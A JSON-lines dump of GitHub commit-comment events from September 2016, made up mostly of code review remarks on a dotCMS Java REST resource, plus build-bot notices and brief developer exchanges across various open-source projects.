{"id":"4625637439","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194295,"position":69,"line":69,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:14:07Z","updated_at":"2016-09-27T17:14:07Z","body":"You should use all api services as a class properties, calling the APILocator inside the methods body makes very difficult the refactoring"}},"created_at":"2016-09-27T17:14:07Z"}
{"id":"4625641335","type":"CommitCommentEvent","actor":{"login":"firstpersoncode"},"repo":{"name":"firstpersoncode/villa-kubu"},"payload":{"comment":{"id":19194305,"position":null,"line":null,"path":null,"commit_id":"82af6624be8ab3aef237d6e320e81757a991e074","created_at":"2016-09-27T17:14:49Z","updated_at":"2016-09-27T17:14:49Z","body":"Grunt config. \r\nPlease, do not make changes except for adding file's url if you add new file inside the 'development' folder."}},"created_at":"2016-09-27T17:14:49Z"}
{"id":"4625644449","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194316,"position":82,"line":82,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:15:21Z","updated_at":"2016-09-27T17:15:21Z","body":"Start threads in a free way could be a dangerous practice.\r\n- we already have in 3.7 a thread pool capabilities\r\n- also keep in consideration to create a second class to encapsulate this logic, it seems a business that wouldn't be on a Resource"}},"created_at":"2016-09-27T17:15:21Z"}
{"id":"4625644666","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19194317,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-27T17:15:23Z","updated_at":"2016-09-27T17:15:23Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T17:15:23Z"}
{"id":"4625645911","type":"CommitCommentEvent","actor":{"login":"DanIverson"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19194319,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T17:15:36Z","updated_at":"2016-09-27T17:15:36Z","body":"Is there a way for me to make a PR from development to master just for the\ncommits I made on Sep 26? If we want the development branch to be the place\nwhere different people can test and share things, there must be a way to\nselectively add things to master after they are tested. Otherwise, I don't\nsee the utility of a development branch.\n\nOn Tue, Sep 27, 2016 at 9:30 AM, Timothy Burrow <notifications@github.com>\nwrote:\n\n> good catch. I thought it looked wrong... I'll fix.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenVnmrJ/OpenVnmrJ/commit/e0d0ff9fb2400e3fe9fc40314607482871d9e911#commitcomment-19193599>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANelBrD72r-ey0qlspOeTskT8LdOucZyks5quUSZgaJpZM4KH2Fd>\n> .\n>\n"}},"created_at":"2016-09-27T17:15:36Z"}
{"id":"4625645922","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194320,"position":86,"line":86,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:15:36Z","updated_at":"2016-09-27T17:15:36Z","body":"This should be a reference per previous comment"}},"created_at":"2016-09-27T17:15:36Z"}
{"id":"4625646469","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19194323,"position":null,"line":null,"path":null,"commit_id":"f41b7cd64f510da8897f6929224314bb5b0140df","created_at":"2016-09-27T17:15:42Z","updated_at":"2016-09-27T17:15:42Z","body":"I have had zero fails yet, IDK why your setup is fucked. Wait a\nsecond...... Don't tell me you're using GitKraken?\n\nOn Tue, Sep 27, 2016, 10:00 PM sc4ryb3ar <notifications@github.com> wrote:\n\n> and yet another fail\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ChikaraOSP/manifest/commit/f41b7cd64f510da8897f6929224314bb5b0140df#commitcomment-19193607>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMuuGt8h1y97I88zgwJPV_h-1Iy9cvcUks5quUS2gaJpZM4KH4Vt>\n> .\n>\n"}},"created_at":"2016-09-27T17:15:42Z"}
{"id":"4625646945","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194324,"position":87,"line":87,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:15:48Z","updated_at":"2016-09-27T17:15:48Z","body":"Same as previous comment"}},"created_at":"2016-09-27T17:15:48Z"}
{"id":"4625652733","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194345,"position":109,"line":109,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:16:40Z","updated_at":"2016-09-27T17:16:40Z","body":"the 200 again :)"}},"created_at":"2016-09-27T17:16:40Z"}
{"id":"4625653817","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194349,"position":110,"line":110,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:16:52Z","updated_at":"2016-09-27T17:16:52Z","body":"Another reference to the ApiLocator"}},"created_at":"2016-09-27T17:16:52Z"}
{"id":"4625655088","type":"CommitCommentEvent","actor":{"login":"jaaf"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19194355,"position":1,"line":1,"path":"docs/guide-fr/db-active-record.md","commit_id":"181e66b8601c70d55177c7d4f0be8599dc63bfc2","created_at":"2016-09-27T17:17:05Z","updated_at":"2016-09-27T17:17:05Z","body":"Hi,\r\nI confess, I continue thinking that my own way is not that bad, once you have accepted that \"enregistrement actif\" is an instance of ActiveRecord. But on the other hand, if this is not the regular way developers are used to, I would be stubbornness to insist any longer. As in reality, I can easily accept the way your are pointing me at, I will change my translation accordingly.\r\nI don't know if you speak or read French, but if it is the case, please watch the db-active-record.md file, and when corrected, please give me your feedback, once again."}},"created_at":"2016-09-27T17:17:05Z"}
{"id":"4625655125","type":"CommitCommentEvent","actor":{"login":"frdmn"},"repo":{"name":"frdmn/servant-cli"},"payload":{"comment":{"id":19194356,"position":null,"line":null,"path":null,"commit_id":"67e8c94cdc67e2f6e4d7fb6b3307eba75849b692","created_at":"2016-09-27T17:17:06Z","updated_at":"2016-09-27T17:17:06Z","body":"Haha 😂 \n\nVon meinem iPhone gesendet\n\n> Am 27.09.2016 um 18:28 schrieb Snedr <notifications@github.com>:\n> \n> 😎\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-27T17:17:06Z"}
{"id":"4625656135","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19194358,"position":null,"line":null,"path":null,"commit_id":"bb9e08d5d60c0a868ef762b062738d84a7d486f8","created_at":"2016-09-27T17:17:16Z","updated_at":"2016-09-27T17:17:16Z","body":"Why is this file needed ?"}},"created_at":"2016-09-27T17:17:16Z"}
{"id":"4625656496","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194359,"position":121,"line":121,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:17:20Z","updated_at":"2016-09-27T17:17:20Z","body":"Those should be a constants. In addition use the constant in the left side to avoid NPE"}},"created_at":"2016-09-27T17:17:20Z"}
{"id":"4625658061","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194363,"position":136,"line":136,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:17:38Z","updated_at":"2016-09-27T17:17:38Z","body":"curly brackets"}},"created_at":"2016-09-27T17:17:38Z"}
{"id":"4625661861","type":"CommitCommentEvent","actor":{"login":"andycniels"},"repo":{"name":"andycniels/phpcphbusiness"},"payload":{"comment":{"id":19194372,"position":5,"line":5,"path":"db_connect.php","commit_id":"21994da25ebf3732325b26753bdfa3d3fc84cdf0","created_at":"2016-09-27T17:18:11Z","updated_at":"2016-09-27T17:18:11Z","body":"lk"}},"created_at":"2016-09-27T17:18:11Z"}
{"id":"4625661929","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"zendtech/php-src"},"payload":{"comment":{"id":19194373,"position":52,"line":659,"path":"ext/opcache/jit/zend_jit.c","commit_id":"5f025e330bb2e2fe3363ba860a882ed1f0258e6b","created_at":"2016-09-27T17:18:12Z","updated_at":"2016-09-27T17:18:12Z","body":"Thanks, the purpose of the code is now clearer. It looks like there is still a small issue where the case of both overflow and underflow being set is not handled correctly:\r\n\r\n```php\r\n<?php\r\nfunction test($x, $y) {\r\n    if ($x >= 0) {\r\n        $z = $x + $y;\r\n        var_dump($z);\r\n    }\r\n}\r\ntest(PHP_INT_MAX, PHP_INT_MAX);\r\n```\r\n\r\nWith JIT this returns int(-2)"}},"created_at":"2016-09-27T17:18:12Z"}
{"id":"4625663452","type":"CommitCommentEvent","actor":{"login":"melisabok"},"repo":{"name":"iesl/openreview-scripts"},"payload":{"comment":{"id":19194378,"position":8,"line":4,"path":"nips2016_NAMPI/process/commentProcess.js","commit_id":"189a5b7ef74488f6005ef4aabe5f2881eec77222","created_at":"2016-09-27T17:18:27Z","updated_at":"2016-09-27T17:18:27Z","body":"add ;"}},"created_at":"2016-09-27T17:18:27Z"}
{"id":"4625663876","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194380,"position":137,"line":137,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:18:32Z","updated_at":"2016-09-27T17:18:32Z","body":"Probably the DateUtil could be useful, you might have a method with this formatter as a default."}},"created_at":"2016-09-27T17:18:32Z"}
{"id":"4625667027","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194391,"position":186,"line":186,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:19:05Z","updated_at":"2016-09-27T17:19:05Z","body":"constants"}},"created_at":"2016-09-27T17:19:05Z"}
{"id":"4625667528","type":"CommitCommentEvent","actor":{"login":"edeyoung"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19194392,"position":37,"line":764,"path":"app/assets/javascripts/views/patient_dashboard/measure_patient_dashboard.js.coffee","commit_id":"ec65be0d7b9a2a7602b8f1ee635ba64e33476e3e","created_at":"2016-09-27T17:19:10Z","updated_at":"2016-09-27T17:19:10Z","body":"variable names can be improved."}},"created_at":"2016-09-27T17:19:10Z"}
{"id":"4625671257","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194400,"position":197,"line":197,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:19:49Z","updated_at":"2016-09-27T17:19:49Z","body":"We already have some methods to achieve errors, in addition to i18n support"}},"created_at":"2016-09-27T17:19:49Z"}
{"id":"4625671281","type":"CommitCommentEvent","actor":{"login":"melisabok"},"repo":{"name":"iesl/openreview-scripts"},"payload":{"comment":{"id":19194401,"position":92,"line":79,"path":"nips2016_NAMPI/process/commentProcess.js","commit_id":"189a5b7ef74488f6005ef4aabe5f2881eec77222","created_at":"2016-09-27T17:19:50Z","updated_at":"2016-09-27T17:19:50Z","body":"you don't need an if, the includes function returns a boolean\r\n\r\n```\r\n var visibleToEveryone = note.readers.includes('everyone');\r\n\r\n```"}},"created_at":"2016-09-27T17:19:50Z"}
{"id":"4625672277","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194404,"position":213,"line":213,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:20:00Z","updated_at":"2016-09-27T17:20:00Z","body":"constants"}},"created_at":"2016-09-27T17:20:00Z"}
{"id":"4625672585","type":"CommitCommentEvent","actor":{"login":"steida"},"repo":{"name":"este/este"},"payload":{"comment":{"id":19194406,"position":20,"line":20,"path":"src/common/lib/redux-firebase/firebase.js","commit_id":"55124e22f1148886721ee95689aece95965cdf68","created_at":"2016-09-27T17:20:04Z","updated_at":"2016-09-27T17:20:04Z","body":"I need Firebase DB because it's real-time, offline, and with powerfull cloud."}},"created_at":"2016-09-27T17:20:04Z"}
{"id":"4625672594","type":"CommitCommentEvent","actor":{"login":"frankleonrose"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":19194407,"position":null,"line":null,"path":null,"commit_id":"40e96518686393932ae3ee73aa7c06ee9af993d6","created_at":"2016-09-27T17:20:04Z","updated_at":"2016-09-27T17:20:04Z","body":"It sounds like you think I have a problem with the strategy of transmitting to only enabled channels. I do not.\r\n\r\nI'm talking only about the algorithm for selecting an enabled channel. Just that for-loop. (It's probably not even worth thinking about or optimizing, which is why you think I'm talking about something else, because you think I'd know better.)\r\n\r\nHere's my point. An idealized algorithm would create a Set of the enabled channels, sized N, and then pick a random number 0<=rnd<N to select an enabled channel. Boom boom done. But of course, creating that set is a bunch of setup that is not negligible.\r\n\r\nThe two algorithms we use now are\r\n\r\n1. ```do { pick a number 0<=x<64 } while (!enabled(x))```\r\nWhich has the problem that it could spend a lot of time throwing darts if there aren't many channels enabled. (just in the loop - well before transmitting). A lot of time becomes infinite when there are no channels enabled (which, yes, would be a library user error, but not friendly of us to just hang.) \r\n\r\n2. ```pick a number 0<=x<64. while (!enabled(x)) { x = ++x % 64 }```\r\nWhich has the problem that an enabled channel just above a set of disabled channels will be chosen much more frequently than a channel in the middle of a set of enabled channels.\r\n\r\nI'll stop talking now and just post code if I write any. Cheers."}},"created_at":"2016-09-27T17:20:04Z"}
{"id":"4625672686","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194408,"position":214,"line":214,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:20:05Z","updated_at":"2016-09-27T17:20:05Z","body":"curly brackets"}},"created_at":"2016-09-27T17:20:05Z"}
{"id":"4625677461","type":"CommitCommentEvent","actor":{"login":"melisabok"},"repo":{"name":"iesl/openreview-scripts"},"payload":{"comment":{"id":19194423,"position":104,"line":99,"path":"nips2016_NAMPI/process/commentProcess.js","commit_id":"189a5b7ef74488f6005ef4aabe5f2881eec77222","created_at":"2016-09-27T17:20:56Z","updated_at":"2016-09-27T17:20:56Z","body":"same as before"}},"created_at":"2016-09-27T17:20:56Z"}
{"id":"4625678787","type":"CommitCommentEvent","actor":{"login":"ameypg16"},"repo":{"name":"ameypg16/test"},"payload":{"comment":{"id":19194427,"position":null,"line":null,"path":null,"commit_id":"d437c241310e4fc22f66d19715b4f9e5bf105617","created_at":"2016-09-27T17:21:10Z","updated_at":"2016-09-27T17:21:10Z","body":"\r\n\r\n![poisson](https://cloud.githubusercontent.com/assets/22479435/18884398/dbbc5104-8504-11e6-91a0-db7bfeda1c53.png)\r\n"}},"created_at":"2016-09-27T17:21:10Z"}
{"id":"4625679610","type":"CommitCommentEvent","actor":{"login":"sc4ryb3ar"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19194432,"position":null,"line":null,"path":null,"commit_id":"f41b7cd64f510da8897f6929224314bb5b0140df","created_at":"2016-09-27T17:21:18Z","updated_at":"2016-09-27T17:21:18Z","body":"yeah, I'm trying to set my global config to use my gpg key for signing, and for signing off on commits. so far I haven't gotten it to work yet\r\n"}},"created_at":"2016-09-27T17:21:18Z"}
{"id":"4625680515","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194435,"position":288,"line":288,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:21:27Z","updated_at":"2016-09-27T17:21:27Z","body":"This should use the standard response with the ResponseView and also be i18n, the same for ok response"}},"created_at":"2016-09-27T17:21:27Z"}
{"id":"4625685538","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"ycho/aom"},"payload":{"comment":{"id":19194446,"position":5,"line":1859,"path":"av1/encoder/rdopt.c","commit_id":"a7b5f659b5750173a0bf70e816a775a4ca047eaf","created_at":"2016-09-27T17:22:18Z","updated_at":"2016-09-27T17:22:18Z","body":"If you multiply *distortion by some factor, you should also multiply *sse by the same factor if you don't want uv skip to be picked more often"}},"created_at":"2016-09-27T17:22:18Z"}
{"id":"4625686875","type":"CommitCommentEvent","actor":{"login":"theory"},"repo":{"name":"theory/pgtap"},"payload":{"comment":{"id":19194450,"position":null,"line":null,"path":null,"commit_id":"5ad76e25067463a863b12a13cfd3203f82595f9f","created_at":"2016-09-27T17:22:32Z","updated_at":"2016-09-27T17:22:32Z","body":"Would you open an issue for that, please, Christoph? Thanks!"}},"created_at":"2016-09-27T17:22:32Z"}
{"id":"4625686945","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19194451,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-27T17:22:32Z","updated_at":"2016-09-27T17:22:32Z","body":"BTW, just something I found myself using a lot.\r\n\r\nIf you're not already familiar, you should memorize a transformation known as [DeMorgan's Law](https://en.wikipedia.org/wiki/De_Morgan%27s_laws). It's very useful for re-writing the conditional statement of an if-statement.\r\n\r\nEssentially, the law says that the following two expressions are equivalent (assuming A and B are bools):\r\n* `!(a && b) == (!a || !b)`\r\n\r\nSimilarly,\r\n* `!(a || b) == (!a && !b)`\r\n\r\nIt's helpful for rewriting complex conditionals into one thats easier for the human to parse.\r\n"}},"created_at":"2016-09-27T17:22:32Z"}
{"id":"4625689758","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194455,"position":77,"line":197,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:23:02Z","updated_at":"2016-09-27T17:23:02Z","body":"You shouldn't call the Resource here, what we do is to encapsulate the common logic in an Util or Helper and this object will be a dependency of the Ajax and Resource"}},"created_at":"2016-09-27T17:23:02Z"}
{"id":"4625692269","type":"CommitCommentEvent","actor":{"login":"thedunster"},"repo":{"name":"thedunster/docs"},"payload":{"comment":{"id":19194457,"position":35,"line":35,"path":"content/admin/teamserver/install/InstallingDistributedTeamServer.md","commit_id":"c26e8a41d46d23e9ff9db83ead17e26d28023a62","created_at":"2016-09-27T17:23:28Z","updated_at":"2016-09-27T17:23:28Z","body":"Changed the wording. "}},"created_at":"2016-09-27T17:23:28Z"}
{"id":"4625692431","type":"CommitCommentEvent","actor":{"login":"snarfed"},"repo":{"name":"kylewm/brevity"},"payload":{"comment":{"id":19194458,"position":null,"line":null,"path":null,"commit_id":"ea2130f4e2b9cbc9ec376b9d002d871759c6be27","created_at":"2016-09-27T17:23:30Z","updated_at":"2016-09-27T17:23:30Z","body":"cool! yay, thank you!\r\n\r\n...looks like this broke granary though. :/ https://circleci.com/gh/snarfed/granary/302\r\n\r\nmind looking when you get a chance? no hurry. i _think_ it's just removing https://github.com/snarfed/granary/blob/master/granary/twitter.py#L770-L771 and updating tests, but not sure."}},"created_at":"2016-09-27T17:23:30Z"}
{"id":"4625693461","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194462,"position":80,"line":200,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:23:41Z","updated_at":"2016-09-27T17:23:41Z","body":"InvalidIndexNameException could be a good candidate, well it depending of course of your exception policies"}},"created_at":"2016-09-27T17:23:41Z"}
{"id":"4625695056","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19194469,"position":null,"line":null,"path":null,"commit_id":"a1b9f672d6f69bff449ceababfb480e577637b66","created_at":"2016-09-27T17:23:59Z","updated_at":"2016-09-27T17:23:59Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n"}},"created_at":"2016-09-27T17:23:59Z"}
{"id":"4625698076","type":"CommitCommentEvent","actor":{"login":"anadahz"},"repo":{"name":"TheTorProject/lepidopter"},"payload":{"comment":{"id":19194481,"position":null,"line":null,"path":null,"commit_id":"e24b00fc613d177cc1ca935a5e073337384f04fa","created_at":"2016-09-27T17:24:31Z","updated_at":"2016-09-27T17:24:31Z","body":"@hellais thanks, I have fixed the version file in  bdf12d1 .\r\nI should make a release checklist for future lepidopter releases."}},"created_at":"2016-09-27T17:24:31Z"}
{"id":"4625704599","type":"CommitCommentEvent","actor":{"login":"tikismoke"},"repo":{"name":"tikismoke/domogik-plugin-xeedevice"},"payload":{"comment":{"id":19194493,"position":null,"line":null,"path":null,"commit_id":"c7d381e773e3c4a4655cad43e2198e480a49abfa","created_at":"2016-09-27T17:25:40Z","updated_at":"2016-09-27T17:25:40Z","body":"Solve https://github.com/domogik/domogik/issues/278"}},"created_at":"2016-09-27T17:25:40Z"}
{"id":"4625704981","type":"CommitCommentEvent","actor":{"login":"jdotcms"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19194495,"position":null,"line":null,"path":null,"commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T17:25:43Z","updated_at":"2016-09-27T17:25:43Z","body":"Several comment could be applied to some other parts of the code with the same patterns, such as constants, APILocator references on the code, the way to use the Responses on the Resources, etc.\r\n\r\nHowever in general terms the code looks awesome, great job Rizo! \\m/"}},"created_at":"2016-09-27T17:25:43Z"}
{"id":"4625705453","type":"CommitCommentEvent","actor":{"login":"lucaderi"},"repo":{"name":"ntop/nDPI"},"payload":{"comment":{"id":19194498,"position":null,"line":null,"path":null,"commit_id":"67ac0b431c3bb812829db4a927a309a089bca13e","created_at":"2016-09-27T17:25:48Z","updated_at":"2016-09-27T17:25:48Z","body":"See https://github.com/ntop/nDPI/commit/a0a8c0294d5e50396517cdc445478e3cf73b42f4 and the crash is gone."}},"created_at":"2016-09-27T17:25:48Z"}
{"id":"4625706267","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19194501,"position":5,"line":5,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T17:25:57Z","updated_at":"2016-09-27T17:25:57Z","body":"Put this comment block right above `package bst` without any blank lines between them.\r\nAlso, Go style is to start this as `Package bst implements ...`.\r\n\r\nDoing this allows godoc and online documentation tools to properly pick up this comment block as part of the documentation.\r\nFor example: https://golang.org/src/archive/tar/common.go\r\nResults in: https://golang.org/pkg/archive/tar/#pkg-overview"}},"created_at":"2016-09-27T17:25:57Z"}
{"id":"4625706425","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19194503,"position":null,"line":null,"path":null,"commit_id":"f066da3cd44196822c14b09aaf04149ea944fb6f","created_at":"2016-09-27T17:25:58Z","updated_at":"2016-09-27T17:25:58Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 435](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1243&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-27T17:25:58Z"}
{"id":"4625706554","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19194504,"position":null,"line":null,"path":null,"commit_id":"6a14d11e8810fbbeba459ed4b2d8a800b408e4b6","created_at":"2016-09-27T17:26:00Z","updated_at":"2016-09-27T17:26:00Z","body":"Good idea!"}},"created_at":"2016-09-27T17:26:00Z"}
{"id":"4625707905","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19194507,"position":null,"line":null,"path":null,"commit_id":"8ada781ee45c824c6eff6353fccde5a4a34b93e0","created_at":"2016-09-27T17:26:14Z","updated_at":"2016-09-27T17:26:14Z","body":"PrepFor86Release (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8ada781ee45c824c6eff6353fccde5a4a34b93e0-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8ada781ee45c824c6eff6353fccde5a4a34b93e0-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T17:26:14Z"}
{"id":"4625710396","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19194509,"position":null,"line":null,"path":null,"commit_id":"f066da3cd44196822c14b09aaf04149ea944fb6f","created_at":"2016-09-27T17:26:40Z","updated_at":"2016-09-27T17:26:40Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 435](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1243&buildTypeId=XbimEssentials_XbimEssentials) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 1 (new)) Build time: 00:00:42"}},"created_at":"2016-09-27T17:26:40Z"}
{"id":"4625711254","type":"CommitCommentEvent","actor":{"login":"tikismoke"},"repo":{"name":"tikismoke/domogik-plugin-nestdevice"},"payload":{"comment":{"id":19194510,"position":null,"line":null,"path":null,"commit_id":"5b473ee2edd1ad623f655fdb60eca1c05832ad14","created_at":"2016-09-27T17:26:49Z","updated_at":"2016-09-27T17:26:49Z","body":"Solve https://github.com/domogik/domogik/issues/278"}},"created_at":"2016-09-27T17:26:49Z"}
{"id":"4625711809","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":19194512,"position":null,"line":null,"path":null,"commit_id":"4556582ca3c05ce7227cf2c259809273e7b50442","created_at":"2016-09-27T17:26:55Z","updated_at":"2016-09-27T17:26:55Z","body":"Thanks for the update. I was about to put this on the issues page."}},"created_at":"2016-09-27T17:26:55Z"}
{"id":"4625714543","type":"CommitCommentEvent","actor":{"login":"leojona"},"repo":{"name":"leojona/hello-world"},"payload":{"comment":{"id":19194520,"position":null,"line":null,"path":null,"commit_id":"37224d8f46490523dd7bdc60f00013871f44a5b1","created_at":"2016-09-27T17:27:22Z","updated_at":"2016-09-27T17:27:22Z","body":"Never ever tried programming in my life. peace.\r\nFrom Germany!\r\nIf anyone reads this. Whats a fun thing to do on here ?"}},"created_at":"2016-09-27T17:27:22Z"}
{"id":"4625718611","type":"CommitCommentEvent","actor":{"login":"wolfmanjm"},"repo":{"name":"Smoothieware/Smoothieware"},"payload":{"comment":{"id":19194535,"position":null,"line":null,"path":null,"commit_id":"f43c04b47547217359a1494289da7949e8938040","created_at":"2016-09-27T17:28:03Z","updated_at":"2016-09-27T17:28:03Z","body":"look at the git checksums"}},"created_at":"2016-09-27T17:28:03Z"}
